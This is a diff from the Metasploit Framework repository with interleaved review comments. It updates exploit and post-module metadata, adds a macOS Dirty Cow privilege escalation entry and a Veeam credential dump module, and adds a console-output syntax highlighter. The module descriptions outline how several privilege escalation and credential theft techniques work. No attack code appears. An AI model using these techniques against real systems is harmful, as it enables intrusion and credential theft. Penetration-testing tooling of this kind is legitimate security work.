"ref_name": "linux/ssh/symantec_smg_ssh",
@@ -79306,6 +79867,15 @@
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"Reliability": [
"repeatable-session"
],
"SideEffects": [
]
},
"session_types": false,
"needs_cleanup": null
@@ -79339,7 +79909,7 @@
"targets": [
"Universal"
],
"mod_time": "2022-04-18 09:36:52 +0000",
"mod_time": "2023-01-31 23:59:22 +0000",
"path": "/modules/exploits/linux/ssh/vmware_vdp_known_privkey.rb",
"is_install_path": true,
"ref_name": "linux/ssh/vmware_vdp_known_privkey",
@@ -79347,6 +79917,15 @@
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"Reliability": [
"repeatable-session"
],
"SideEffects": [
]
},
"session_types": false,
"needs_cleanup": null
@@ -93857,7 +94436,7 @@
"Windows",
"Linux"
],
"mod_time": "2018-12-14 13:08:50 +0000",
"mod_time": "2022-12-30 12:29:14 +0000",
"path": "/modules/exploits/multi/http/struts2_namespace_ognl.rb",
"is_install_path": true,
"ref_name": "multi/http/struts2_namespace_ognl",
@@ -97635,7 +98214,7 @@
"h00die <mike@stcyrsecurity.com>",
"KotCzarny"
],
"description": "This module attempts to exploit a debug backdoor privilege escalation in\n Allwinner SoC based devices.\n Vulnerable Allwinner SoC chips: H3, A83T or H8 which rely on Kernel 3.4\n Vulnerable OS: all OS images available for Orange Pis,\n any for FriendlyARM's NanoPi M1,\n SinoVoip's M2+ and M3,\n Cuebietech's Cubietruck +\n Linksprite's pcDuino8 Uno\n Exploitation may be possible against Dragon (x10) and Allwinner Android tablets",
"description": "This module attempts to exploit a debug backdoor privilege escalation in\n Allwinner SoC based devices.\n\n Vulnerable Allwinner SoC chips: H3, A83T or H8 which rely on Kernel 3.4.\n\n Vulnerable OS: all OS images available for Orange Pis,\n any for FriendlyARM's NanoPi M1,\n SinoVoip's M2+ and M3,\n Cuebietech's Cubietruck +\n Linksprite's pcDuino8 Uno.\n Exploitation may be possible against Dragon (x10) and Allwinner Android tablets.",
"references": [
"CVE-2016-10225",
"URL-http://forum.armbian.com/index.php/topic/1108-security-alert-for-allwinner-sun8i-h3a83th8/",
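Review bot: while the allwinner_backdoor description is being reflowed, "Cuebietech's Cubietruck +" is a misspelling of Cubietech and the trailing "+" reads as a stray character before the Linksprite line; suggest "Cubietech's Cubietruck, and Linksprite's pcDuino8 Uno." so the reflowed list ends cleanly.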
@@ -97654,7 +98233,7 @@
"targets": [
"Auto"
],
"mod_time": "2020-10-02 17:38:06 +0000",
"mod_time": "2023-01-28 15:02:24 +0000",
"path": "/modules/exploits/multi/local/allwinner_backdoor.rb",
"is_install_path": true,
"ref_name": "multi/local/allwinner_backdoor",
@@ -97662,6 +98241,15 @@
"post_auth": false,
"default_credential": false,
"notes": {
"Reliability": [
"repeatable-session"
],
"Stability": [
"crash-safe"
],
"SideEffects": [
"artifacts-on-disk"
]
},
"session_types": [
"shell",
@@ -97683,7 +98271,7 @@
"Romain Trouve",
"bcoles <bcoles@gmail.com>"
],
"description": "This module attempts to gain root privileges on systems running\n MagniComp SysInfo versions prior to 10-H64.\n\n The .mcsiwrapper suid executable allows loading a config file using the\n '--configfile' argument. The 'ExecPath' config directive is used to set\n the executable load path. This module abuses this functionality to set\n the load path resulting in execution of arbitrary code as root.\n\n This module has been tested successfully with SysInfo version\n 10-H63 on Fedora 20 x86_64, 10-H32 on Fedora 27 x86_64, 10-H10 on\n Debian 8 x86_64, and 10-GA on Solaris 10u11 x86.",
"description": "This module attempts to gain root privileges on systems running\n MagniComp SysInfo versions prior to 10-H64.\n\n The .mcsiwrapper suid executable allows loading a config file using the\n '--configfile' argument. The 'ExecPath' config directive is used to set\n the executable load path. This module abuses this functionality to set\n the load path resulting in execution of arbitrary code as root.\n\n This module has been tested successfully with SysInfo version\n 10-H63 on Fedora 20 x86_64, 10-H32 on Fedora 27 x86_64, 10-H10 on\n Debian 8 x86_64, and 10-GA on Solaris 10u11 x86.",
"references": [
"CVE-2017-6516",
"BID-96934",
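Review bot: the old and new `description` strings for magnicomp_sysinfo_mcsiwrapper_priv_esc are identical as rendered here, so this hunk is a whitespace-only change; the same holds for the dynamic_loader_chpass_privesc description hunk further down. Harmless, but it inflates the diff; if the generator is now normalizing trailing whitespace in descriptions, a line in the commit message would save the next reviewer the comparison.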
@@ -97705,7 +98293,7 @@
"Solaris",
"Linux"
],
"mod_time": "2021-02-17 12:33:59 +0000",
"mod_time": "2023-01-28 15:02:24 +0000",
"path": "/modules/exploits/multi/local/magnicomp_sysinfo_mcsiwrapper_priv_esc.rb",
"is_install_path": true,
"ref_name": "multi/local/magnicomp_sysinfo_mcsiwrapper_priv_esc",
@@ -97718,6 +98306,9 @@
],
"Stability": [
"crash-safe"
],
"SideEffects": [
"artifacts-on-disk"
]
},
"session_types": [
@@ -97823,7 +98414,7 @@
"Linux x64",
"Linux x86"
],
"mod_time": "2021-10-06 13:43:31 +0000",
"mod_time": "2023-01-28 15:02:24 +0000",
"path": "/modules/exploits/multi/local/xorg_x11_suid_server.rb",
"is_install_path": true,
"ref_name": "multi/local/xorg_x11_suid_server",
@@ -97831,6 +98422,16 @@
"post_auth": false,
"default_credential": false,
"notes": {
"Reliability": [
"unreliable-session"
],
"Stability": [
"crash-service-down"
],
"SideEffects": [
"artifacts-on-disk",
"config-changes"
]
},
"session_types": [
"shell",
@@ -97851,7 +98452,7 @@
"Narendra Shinde",
"Aaron Ringo"
],
"description": "This module attempts to gain root privileges with SUID Xorg X11 server\n versions 1.19.0 < 1.20.3.\n\n A permission check flaw exists for -modulepath and -logfile options when\n starting Xorg. This allows unprivileged users that can start the server\n the ability to elevate privileges and run arbitrary code under root\n privileges.\n\n This module has been tested with CentOS 7 (1708).\n CentOS default install will require console auth for the users session.\n Xorg must have SUID permissions and may not start if running.\n\n On successful exploitation artifacts will be created consistant\n with starting Xorg.",
"description": "This module attempts to gain root privileges with SUID Xorg X11 server\n versions 1.19.0 < 1.20.3.\n\n A permission check flaw exists for -modulepath and -logfile options when\n starting Xorg. This allows unprivileged users that can start the server\n the ability to elevate privileges and run arbitrary code under root\n privileges.\n\n This module has been tested with CentOS 7 (1708).\n CentOS default install will require console auth for the users session.\n Xorg must have SUID permissions and may not start if running.\n\n On successful exploitation artifacts will be created consistant\n with starting Xorg.",
"references": [
"CVE-2018-14665",
"BID-105741",
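Review bot: the xorg_x11_suid_server_modulepath description is regenerated without visible change and still carries the misspelling "consistant" in "artifacts will be created consistant with starting Xorg"; since the string is being rewritten anyway, fix it to "consistent" in the module source so the next metadata update carries the correction.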
@@ -97875,7 +98476,7 @@
"Solaris x86",
"Solaris x64"
],
"mod_time": "2021-02-17 12:33:59 +0000",
"mod_time": "2023-01-28 15:02:24 +0000",
"path": "/modules/exploits/multi/local/xorg_x11_suid_server_modulepath.rb",
"is_install_path": true,
"ref_name": "multi/local/xorg_x11_suid_server_modulepath",
@@ -97883,6 +98484,15 @@
"post_auth": false,
"default_credential": false,
"notes": {
"Reliability": [
"repeatable-session"
],
"Stability": [
"crash-service-down"
],
"SideEffects": [
"artifacts-on-disk"
]
},
"session_types": [
"shell",
@@ -101381,7 +101991,7 @@
"Qualys",
"bcoles <bcoles@gmail.com>"
],
"description": "This module exploits a vulnerability in the OpenBSD `ld.so`\n dynamic loader (CVE-2019-19726).\n\n The `_dl_getenv()` function fails to reset the `LD_LIBRARY_PATH`\n environment variable when set with approximately `ARG_MAX` colons.\n\n This can be abused to load `libutil.so` from an untrusted path,\n using `LD_LIBRARY_PATH` in combination with the `chpass` set-uid\n executable, resulting in privileged code execution.\n\n This module has been tested successfully on:\n\n OpenBSD 6.1 (amd64); and\n OpenBSD 6.6 (amd64)",
"description": "This module exploits a vulnerability in the OpenBSD `ld.so`\n dynamic loader (CVE-2019-19726).\n\n The `_dl_getenv()` function fails to reset the `LD_LIBRARY_PATH`\n environment variable when set with approximately `ARG_MAX` colons.\n\n This can be abused to load `libutil.so` from an untrusted path,\n using `LD_LIBRARY_PATH` in combination with the `chpass` set-uid\n executable, resulting in privileged code execution.\n\n This module has been tested successfully on:\n\n OpenBSD 6.1 (amd64); and\n OpenBSD 6.6 (amd64)",
"references": [
"CVE-2019-19726",
"EDB-47780",
@@ -101403,7 +102013,7 @@
"targets": [
"Automatic"
],
"mod_time": "2020-09-18 11:38:43 +0000",
"mod_time": "2023-02-02 18:17:02 +0000",
"path": "/modules/exploits/openbsd/local/dynamic_loader_chpass_privesc.rb",
"is_install_path": true,
"ref_name": "openbsd/local/dynamic_loader_chpass_privesc",
@@ -101411,6 +102021,15 @@
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"Reliability": [
"repeatable-session"
],
"SideEffects": [
"artifacts-on-disk"
]
},
"session_types": [
"shell"
@@ -102406,6 +103025,62 @@
],
"needs_cleanup": true
},
"exploit_osx/local/mac_dirty_cow": {
"name": "macOS Dirty Cow Arbitrary File Write Local Privilege Escalation",
"fullname": "exploit/osx/local/mac_dirty_cow",
"aliases": [
],
"rank": 600,
"disclosure_date": "2022-12-17",
"type": "exploit",
"author": [
"Ian Beer",
"Zhuowei Zhang",
"timwr"
],
"description": "An app may be able to execute arbitrary code with kernel privileges",
"references": [
"CVE-2022-46689",
"URL-https://github.com/apple-oss-distributions/xnu/blob/xnu-8792.61.2/tests/vm/vm_unaligned_copy_switch_race.c",
"URL-https://github.com/zhuowei/MacDirtyCowDemo"
],
"platform": "OSX",
"arch": "x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Mac OS X x64 (Native Payload)"
],
"mod_time": "2023-02-01 16:56:28 +0000",
"path": "/modules/exploits/osx/local/mac_dirty_cow.rb",
"is_install_path": true,
"ref_name": "osx/local/mac_dirty_cow",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"SideEffects": [
"artifacts-on-disk",
"config-changes"
],
"Reliability": [
"repeatable-session"
],
"Stability": [
"crash-safe"
]
},
"session_types": [
],
"needs_cleanup": true
},
"exploit_osx/local/nfs_mount_root": {
"name": "Mac OS X NFS Mount Privilege Escalation Exploit",
"fullname": "exploit/osx/local/nfs_mount_root",
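Review bot: the description for exploit/osx/local/mac_dirty_cow is the one-line Apple advisory text ("An app may be able to execute arbitrary code with kernel privileges") and does not say what the module actually does. The name says "Arbitrary File Write Local Privilege Escalation" and the references point at xnu's vm_unaligned_copy_switch_race.c test, so the description should state the affected macOS range, that the race yields an arbitrary file write, and which file the module overwrites to get root, since the notes declare config-changes and needs_cleanup is true and an operator needs to know what to put back. Also, "session_types" is an empty array here while the neighbouring OSX entries (for example vmware_fusion_lpe) list "shell" and "meterpreter"; please check that an empty list does not stop the module from being offered against any session type.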
@@ -103004,7 +103679,7 @@
"targets": [
"Auto"
],
"mod_time": "2021-08-27 17:15:33 +0000",
"mod_time": "2023-02-02 18:46:08 +0000",
"path": "/modules/exploits/osx/local/vmware_fusion_lpe.rb",
"is_install_path": true,
"ref_name": "osx/local/vmware_fusion_lpe",
@@ -103012,6 +103687,15 @@
"post_auth": false,
"default_credential": false,
"notes": {
"Reliability": [
"repeatable-session"
],
"Stability": [
"crash-safe"
],
"SideEffects": [
"artifacts-on-disk"
]
},
"session_types": [
"shell",
@@ -103258,7 +103942,7 @@
"Tim Brown",
"bcoles <bcoles@gmail.com>"
],
"description": "This module attempts to gain root privileges on QNX 6.4.x and 6.5.x\n systems by exploiting the ifwatchd suid executable.\n\n ifwatchd allows users to specify scripts to execute using the '-A'\n command line argument; however, it does not drop privileges when\n executing user-supplied scripts, resulting in execution of arbitrary\n commands as root.\n\n This module has been tested successfully on QNX Neutrino 6.5.0 (x86)\n and 6.5.0 SP1 (x86).",
"description": "This module attempts to gain root privileges on QNX 6.4.x and 6.5.x\n systems by exploiting the ifwatchd suid executable.\n\n ifwatchd allows users to specify scripts to execute using the '-A'\n command line argument; however, it does not drop privileges when\n executing user-supplied scripts, resulting in execution of arbitrary\n commands as root.\n\n This module has been tested successfully on QNX Neutrino 6.5.0 (x86)\n and 6.5.0 SP1 (x86).",
"references": [
"CVE-2014-2533",
"BID-66449",
@@ -103277,7 +103961,7 @@
"targets": [
"Automatic"
],
"mod_time": "2020-10-02 17:38:06 +0000",
"mod_time": "2023-02-02 18:17:02 +0000",
"path": "/modules/exploits/qnx/local/ifwatchd_priv_esc.rb",
"is_install_path": true,
"ref_name": "qnx/local/ifwatchd_priv_esc",
@@ -103285,6 +103969,15 @@
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"Reliability": [
"repeatable-session"
],
"SideEffects": [
]
},
"session_types": [
"shell",
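Review bot: the new notes block for qnx/local/ifwatchd_priv_esc declares an empty SideEffects list, but the description says the module abuses ifwatchd's '-A' argument to run a user-supplied script as root, which means a script has to be written to the target first. Unless the module removes it, artifacts-on-disk should be listed, as the sibling local exploits in this changeset do.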
@@ -103306,7 +103999,7 @@
"Mor!p3r",
"bcoles <bcoles@gmail.com>"
],
"description": "This module uses the qconn daemon on QNX systems to gain a shell.\n\n The QNX qconn daemon does not require authentication and allows\n remote users to execute arbitrary operating system commands.\n\n This module has been tested successfully on QNX Neutrino 6.5.0 (x86)\n and 6.5.0 SP1 (x86).",
"description": "This module uses the qconn daemon on QNX systems to gain a shell.\n\n The QNX qconn daemon does not require authentication and allows\n remote users to execute arbitrary operating system commands.\n\n This module has been tested successfully on QNX Neutrino 6.5.0 (x86)\n and 6.5.0 SP1 (x86).",
"references": [
"EDB-21520",
"URL-https://www.optiv.com/blog/pentesting-qnx-neutrino-rtos",
@@ -103325,7 +104018,7 @@
"targets": [
"Automatic"
],
"mod_time": "2020-10-02 17:38:06 +0000",
"mod_time": "2023-02-01 20:51:44 +0000",
"path": "/modules/exploits/qnx/qconn/qconn_exec.rb",
"is_install_path": true,
"ref_name": "qnx/qconn/qconn_exec",
@@ -103333,6 +104026,15 @@
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"Reliability": [
"repeatable-session"
],
"SideEffects": [
]
},
"session_types": false,
"needs_cleanup": null
@@ -152689,7 +153391,7 @@
"targets": [
"Windows x86/x64 with x86 payload"
],
"mod_time": "2021-09-08 21:56:02 +0000",
"mod_time": "2023-01-28 09:08:51 +0000",
"path": "/modules/exploits/windows/local/anyconnect_lpe.rb",
"is_install_path": true,
"ref_name": "windows/local/anyconnect_lpe",
@@ -170411,7 +171113,7 @@
"author": [
"thelightcosine"
],
"description": "This module uses valid credentials to login to the WinRM service\n and execute a payload. It has two available methods for payload\n delivery: Powershell 2.0 and VBS CmdStager.\n\n The module will check if Powershell 2.0 is available, and if so uses\n that method. Otherwise it falls back to the VBS CmdStager which is\n less stealthy.\n\n IMPORTANT: If targeting an x64 system with the Powershell method\n you MUST select an x64 payload. An x86 payload will never return.",
"description": "This module uses valid credentials to login to the WinRM service\n and execute a payload. It has two available methods for payload\n delivery: Powershell 2 (and above) and VBS CmdStager.\n\n The module will check if Powershell is available, and if so uses\n that method. Otherwise it falls back to the VBS CmdStager which is\n less stealthy.",
"references": [
"URL-http://msdn.microsoft.com/en-us/library/windows/desktop/aa384426(v=vs.85).aspx"
],
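Review bot: the rewritten description for windows/winrm/winrm_script_exec drops the "IMPORTANT: If targeting an x64 system with the Powershell method you MUST select an x64 payload. An x86 payload will never return." warning, but nothing in this hunk shows the underlying limitation was fixed. If the x86 payload case now works, the commit should say so; if it does not, the caveat should stay because it is the single most common reason this module appears to hang. Separately, the reference still uses the plain http:// msdn.microsoft.com URL, which now only redirects; an https://learn.microsoft.com link would be more durable.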
@@ -170439,14 +171141,24 @@
"targets": [
"Windows"
],
"mod_time": "2021-01-29 11:17:38 +0000",
"mod_time": "2023-01-03 11:26:07 +0000",
"path": "/modules/exploits/windows/winrm/winrm_script_exec.rb",
"is_install_path": true,
"ref_name": "windows/winrm/winrm_script_exec",
"check": false,
"post_auth": true,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"SideEffects": [
"artifacts-on-disk",
"ioc-in-logs"
],
"Reliability": [
"repeatable-session"
]
},
"session_types": false,
"needs_cleanup": null
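Review bot: "post_auth" flips from true to false for windows/winrm/winrm_script_exec, yet the description in the previous hunk still says the module "uses valid credentials to login to the WinRM service". post_auth is the flag that marks credentialed modules, so this looks like a regression in how the metadata is derived from the module source (for example the module no longer declaring its credential options in a way the generator recognises) rather than an intentional change; it should be true.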
@@ -210518,7 +211230,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-10-06 13:43:31 +0000",
"mod_time": "2022-08-25 16:26:47 +0000",
"path": "/modules/post/multi/manage/autoroute.rb",
"is_install_path": true,
"ref_name": "multi/manage/autoroute",
@@ -212829,7 +213541,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-10-06 13:43:31 +0000",
"mod_time": "2023-01-06 14:21:46 +0000",
"path": "/modules/post/windows/escalate/golden_ticket.rb",
"is_install_path": true,
"ref_name": "windows/escalate/golden_ticket",
@@ -216308,6 +217020,51 @@
],
"needs_cleanup": null
},
"post_windows/gather/credentials/veeam_credential_dump": {
"name": "Veeam Backup and Replication Credentials Dump",
"fullname": "post/windows/gather/credentials/veeam_credential_dump",
"aliases": [
],
"rank": 0,
"disclosure_date": "2022-11-22",
"type": "post",
"author": [
"npm <npm@cesium137.io>"
],
"description": "This module exports and decrypts credentials from Veeam Backup & Replication and\n Veeam ONE Monitor Server to a CSV file; it is intended as a post-exploitation\n module for Windows hosts with either of these products installed. The module\n supports automatic detection of VBR / Veeam ONE and is capable of decrypting\n credentials for all versions including the latest build of 11.x.",
"references": [
"URL-https://blog.checkymander.com/red%20team/veeam/decrypt-veeam-passwords/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2023-01-18 14:27:28 +0000",
"path": "/modules/post/windows/gather/credentials/veeam_credential_dump.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/veeam_credential_dump",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"Reliability": [
"repeatable-session"
],
"SideEffects": [
"ioc-in-logs"
]
},
"session_types": [
"meterpreter"
],
"needs_cleanup": null
},
"post_windows/gather/credentials/viber": {
"name": "Viber credential gatherer",
"fullname": "post/windows/gather/credentials/viber",
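Review bot: the description for post/windows/gather/credentials/veeam_credential_dump claims it "is capable of decrypting credentials for all versions including the latest build of 11.x". "All versions" is not something that was tested and "latest build" goes stale on the next Veeam release; list the concrete Veeam Backup & Replication and Veeam ONE versions the module was verified against, as the other entries in this file do ("This module has been tested successfully on ..."). The disclosure_date of 2022-11-22 also deserves a comment in the module, since the only reference is a blog post and this is a credential-dump post module rather than an exploit for a dated vulnerability.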
@@ -6,4 +6,24 @@
.language-mermaid .label {
text-transform: inherit;
}
.language-msf .zp {
text-decoration: underline;
}
.language-msf .ze {
color: #960050;
}
.language-msf .zg {
color: #859900;
}
.language-msf .zs {
color: #268bd2;
}
.language-msf .zw {
color: orange;
}
</style>
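Review bot: the .language-msf .zp/.ze/.zg/.zs/.zw selectors duplicate the shortnames that the Ruby lexer builds from SHORTNAME = 'z' plus a one-letter suffix, so the two files must be kept in sync by hand; a comment pointing at the lexer would help the next person who renames a token. Also, four of the five colours are hex values from one palette while the warning colour is the named colour orange; pick a hex value from the same palette so the [!] line does not look out of place.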
@@ -0,0 +1,74 @@
require 'rouge'
# Custom highlighting support for Metasploit's prompt
# https://rouge-ruby.github.io/docs/file.LexerDevelopment.html
module Rouge
# Custom tokens specific to Msf, as the inbuilt lexer tokens can't capture
# the detail required for Msf's print_warning/print_good/etc calls.
module Tokens
def self.token(name, shortname, &b)
tok = Token.make_token(name, shortname, &b)
const_set(name, tok)
end
# The 'shortname' is the class used when generating the HTML. It is intentionally
# short to reduce HTML size.
# https://github.com/rouge-ruby/rouge/blob/a4ed658d2778a3e2d3e68873f7221b91149a2ed4/lib/rouge/token.rb#L69
SHORTNAME = 'z'
token :Msf, SHORTNAME do
# prompt - msf / msf5 / msf6 / meterpreter
token :Prompt, "#{SHORTNAME}p"
# [-]
token :Error, "#{SHORTNAME}e"
# [+]
token :Good, "#{SHORTNAME}g"
# [*]
token :Status, "#{SHORTNAME}s"
# [!]
token :Warning, "#{SHORTNAME}w"
end
end
module Lexers
class MetasploitConsoleLanguage < Rouge::RegexLexer
title 'msf'
tag 'msf'
desc 'Metasploit console highlighter'
filenames []
mimetypes []
def self.keywords
@keywords ||= Set.new %w()
end
state :whitespace do
rule %r/\s+/, Text
end
state :root do
mixin :whitespace
# Match msf, msf5, msf6, meterpreter
rule %r{^(msf\d?|meterpreter)}, Tokens::Msf::Prompt, :msf_prompt
rule %r{^\[-\]}, Tokens::Msf::Error
rule %r{^\[\+\]}, Tokens::Msf::Good
rule %r{^\[\*\]}, Tokens::Msf::Status
rule %r{^\[\!\]}, Tokens::Msf::Warning
rule %r{.+}, Text
end
# State for highlighting the prompt such as
# msf6 auxiliary(admin/dcerpc/cve_2022_26923_certifried) >
state :msf_prompt do
mixin :whitespace
rule %r{exploit|payload|auxiliary|encoder|evasion|post|nop}, Text
rule %r{\(}, Punctuation
rule %r{\)}, Punctuation
rule %r{[\w/]+}, Keyword::Constant
rule %r{>}, Punctuation, :pop!
end
end
end
end
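Review bot: the prompt rule `rule %r{^(msf\d?|meterpreter)}, Tokens::Msf::Prompt, :msf_prompt` has no word boundary, so any line that starts with msfconsole, msfvenom or msfdb matches the msf prefix and pushes :msf_prompt. That state only pops on `>`, and because the :whitespace mixin also eats newlines, the lexer then stays in :msf_prompt across all following lines, colouring their words as Keyword::Constant and emitting Rouge Error tokens for characters with no rule there such as `-`. Anchor the prompt with a boundary, for example `%r{^(msf\d?|meterpreter)\b}` or a lookahead for whitespace, and add a newline rule in :msf_prompt that pops so a malformed prompt cannot leak past its line. Two smaller points: `self.keywords` returns an empty Set and is never referenced, and `Tokens.token` redefines a method that Rouge's Tokens module already provides with the same body, so both can be dropped.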
@@ -187,7 +187,7 @@ module Build
@config.enum_for(:each).map { |page| page }
end
# scans for absolute links to the old wiki such as 'https://github.com/rapid7/metasploit-framework/wiki/Metasploit-Web-Service'
# scans for absolute links to the old wiki such as 'https://docs.metasploit.com/docs/using-metasploit/advanced/metasploit-web-service.html'
def extract_absolute_wiki_links(markdown)
new_links = {}
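Review bot: the comment now shows a docs.metasploit.com URL as the example, but the method is still named extract_absolute_wiki_links and the comment still says it "scans for absolute links to the old wiki". If the scanning pattern still targets github.com/rapid7/metasploit-framework/wiki/, the new example is misleading; if the pattern was changed to match docs.metasploit.com links, the method name and the first half of the comment should be updated to match.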
@@ -1,3 +1,3 @@
View the latest API docs at:
[https://rapid7.github.io/metasploit-framework/api/](https://rapid7.github.io/metasploit-framework/api/)
[https://docs.metasploit.com/api/](https://docs.metasploit.com/api/)
@@ -78,7 +78,7 @@ Please select what kind of key you want:
(4) RSA (sign only)
Your selection? 4
RSA keys may be between 1024 and 4096 bits long.
What keysize do you want? (2048)
What keysize do you want? (2048)
Requested keysize is 2048 bits
Please specify how long the key should be valid.
0 = key does not expire
@@ -96,7 +96,7 @@ from the Real Name, Comment and Email Address in this form:
Real name: Dade Murphy
Email address: dmurphy@thegibson.example
Comment:
Comment:
You selected this USER-ID:
"Dade Murphy <dmurphy@thegibson.example>"
@@ -120,7 +120,7 @@ Enter passphrase: [...]
Using `git c` and `git m` from now on will sign every commit with your `DEADBEEF` key. However, note that rebasing or cherry-picking commits will change the commit hash, and therefore, unsign the commit -- to resign the most recent, use `git c --amend`.
[msf-committers]:https://github.com/rapid7/metasploit-framework/wiki/Committer-Rights
[msf-committers]:https://docs.metasploit.com/docs/development/maintainers/committer-rights.html
[pro-sharing]:https://filippo.io/on-keybase-dot-io-and-encrypted-private-key-sharing/
[con-sharing]:https://www.tbray.org/ongoing/When/201x/2014/03/19/Keybase#p-5
[tracking]:https://github.com/keybase/keybase-issues/issues/100
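Review bot: in the unchanged context line above, "to resign the most recent" reads as "to quit"; "re-sign" would make the sentence about re-signing an amended commit unambiguous. Since this hunk already touches the page, it is a cheap fix to fold in.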
@@ -2,7 +2,7 @@
The term "Metasploit Committers" describes people who have direct write access to the [Rapid7 Metasploit-Framework fork](https://github.com/rapid7/metasploit-framework). These are the people who can land changes to this main fork of the Framework. However, it is not necessary to have committer rights in order to contribute to Metasploit. Much of our code comes from non-committers.
We encourage anyone to fork the Metasploit project, make changes, fix bugs, and notify the core committers about those changes via [Pull Requests](http://github.com/rapid7/metasploit-framework/pulls). The process for getting started is most comprehensively documented in the [Metasploit Development Environment](https://github.com/rapid7/metasploit-framework/wiki/Setting-Up-a-Metasploit-Development-Environment) setup guide.
We encourage anyone to fork the Metasploit project, make changes, fix bugs, and notify the core committers about those changes via [Pull Requests](http://github.com/rapid7/metasploit-framework/pulls). The process for getting started is most comprehensively documented in the [[Metasploit Development Environment|./dev/Setting-Up-a-Metasploit-Development-Environment.md]] setup guide.
Metasploit committers are a mix of [Rapid7](http://rapid7.com) employees and outside contributors. Anyone can become a contributor, with the following expectations:
@@ -24,7 +24,7 @@ If you reject a pull request, be clear in the pull request why it was rejected,
Even if someone else approves of a pull request, and it is shown to be broken later, then it is still your responsibility to correct it. Make every effort to get a fix or revert in as soon as possible, whether you wrote the code, landed it, or approved it. Blame is shared equally.
A list of committer public keys [is here](https://github.com/rapid7/metasploit-framework/wiki/Committer-Keys).
A list of committer public keys [[is here|./Committer-Keys.md]].
# How to Gain Commit Rights
@@ -45,7 +45,7 @@ Breaches of trust in terms of malicious or malformed code, or the demonstration
# Useful Links for Committers
* [http://r-7.co/MSF-DEV](https://github.com/rapid7/metasploit-framework/wiki/Setting-Up-a-Metasploit-Development-Environment) is pretty much required reading.
* [[Setting Up a Metasploit Development Environment|./dev/Setting-Up-a-Metasploit-Development-Environment.md]] is pretty much required reading.
* So is [CONTRIBUTING.md](https://github.com/rapid7/metasploit-framework/blob/master/CONTRIBUTING.md)
* Check out the Apache Software Foundation's [Guide for Committers](https://www.apache.org/dev/committers). It's illuminating.
* [Producing Open Source Software](http://www.producingoss.com/gl/) by Ken Fogel is a must-read.
@@ -6,13 +6,13 @@ whilst also avoiding some common pitfalls and learning how some of our systems w
## Initial Steps and Important Notes
The rest of this guide assumes you have already followed the steps at [Setting Up A Developer Environment](https://r-7.co/MSF-DEV) in order to get
a fork of Metasploit set up and ready to run, and that you have added in your SSH keys
(see [Adding a New SSH Key To Your GitHub Account](https://docs.github.com/en/authentication/connecting-to-github-with-ssh/adding-a-new-ssh-key-to-your-github-account)),
a fork of Metasploit set up and ready to run, and that you have added in your SSH keys
(see [Adding a New SSH Key To Your GitHub Account](https://docs.github.com/en/authentication/connecting-to-github-with-ssh/adding-a-new-ssh-key-to-your-github-account)),
set up Ruby and optionally the PostgreSQL database, and done any custom shortcuts you wish to configure.
## Getting the Latest Version of Metasploit Framework
Before making any new contributions, you will want to sure you are running the latest version of Metasploit Framework.
To do this run `git checkout master && git fetch upstream && git pull`, where `upstream` is the branch connected to the
To do this run `git checkout master && git fetch upstream && git pull`, where `upstream` is the branch connected to the
Rapid7 remote, aka Rapid7's copy of the code. You can verify that `upstream` is set correctly by running `git remote get-url upstream`
and verifying it is set to `git@github.com:rapid7/metasploit-framework.git`.
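Review bot: the reflowed sentence calls `upstream` "the branch connected to the Rapid7 remote", but `upstream` is a remote, not a branch, and `git remote get-url upstream` is a query on a remote. More importantly, `git checkout master && git fetch upstream && git pull` fetches from upstream but then pulls from whatever master tracks, which after the fork setup is normally `origin` (the reader's own fork), so the command does not bring in Rapid7's latest changes. Suggest `git checkout master && git fetch upstream && git merge upstream/master` (or `git pull upstream master`).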
@@ -51,13 +51,13 @@ done when the code is ready to be landed into Metasploit Framework to help make
## Checking for Code Errors
Before code can be accepted into Metasploit Framework, it must also pass our RuboCop and MsfTidy rules. These help ensure that
all contributors are committing code that follows a common set of standards. To check if your code meets our RuboCop standards,
all contributors are committing code that follows a common set of standards. To check if your code meets our RuboCop standards,
from the root of wherever you cloned your fork of Metasploit Framework to on disk, run `rubocop <path to your module from current directory>`.
Specifying the `-a` parameter will ask RuboCop to check your module and if possible fix any issues that RuboCop is able to fix.
In this case the command would be `rubocop -a <path to your module from current directory>`. It is encouraged to keep running
this command and fixing any issues that come up until RuboCop no longer comes back with any errors to report. Once this is
complete, run `git add <file>` followed by `git commit -m "RuboCop Fixes"`. You can change the commit message if you
In this case the command would be `rubocop -a <path to your module from current directory>`. It is encouraged to keep running
this command and fixing any issues that come up until RuboCop no longer comes back with any errors to report. Once this is
complete, run `git add <file>` followed by `git commit -m "RuboCop Fixes"`. You can change the commit message if you
want, but it should mention RuboCop as it helps maintainers know what the commit is related to.
As a good practice rule, you should always separate your commits that contain RuboCop changes from those that contain non-RuboCop related changes.
@@ -71,8 +71,8 @@ against your module code (if applicable), using `tools/dev/msftidy.rb <path to m
if your module passed the tests. Try and fix any errors mentioned here.
## Writing Documentation
The next step to do, if you are writing a module, is to write the documentation for the module. You can find some information
on how to write module documentation at [Writing Module Documentation](https://docs.metasploit.com/docs/development/quality/writing-module-documentation.html).
The next step to do, if you are writing a module, is to write the documentation for the module. You can find some information
on how to write module documentation at [[Writing Module Documentation|./Writing-Module-Documentation.md]].
In general when writing documentation you will want to search for a similar documentation file under the `documentation`
folder located in the root of the Metasploit fork. You can then copy one of these files and use it as the basis for writing
@@ -91,15 +91,15 @@ these may be okay to ignore depending on the context. A good example is if a lin
safely ignored.
## Submitting Your Changes and Opening a PR
Once you have gone through all of the steps above you should be ready to submit your PR. To submit your PR, first check which
branch points to your copy of the code. If you have followed the setup guide, it should be `origin`. You can double check this
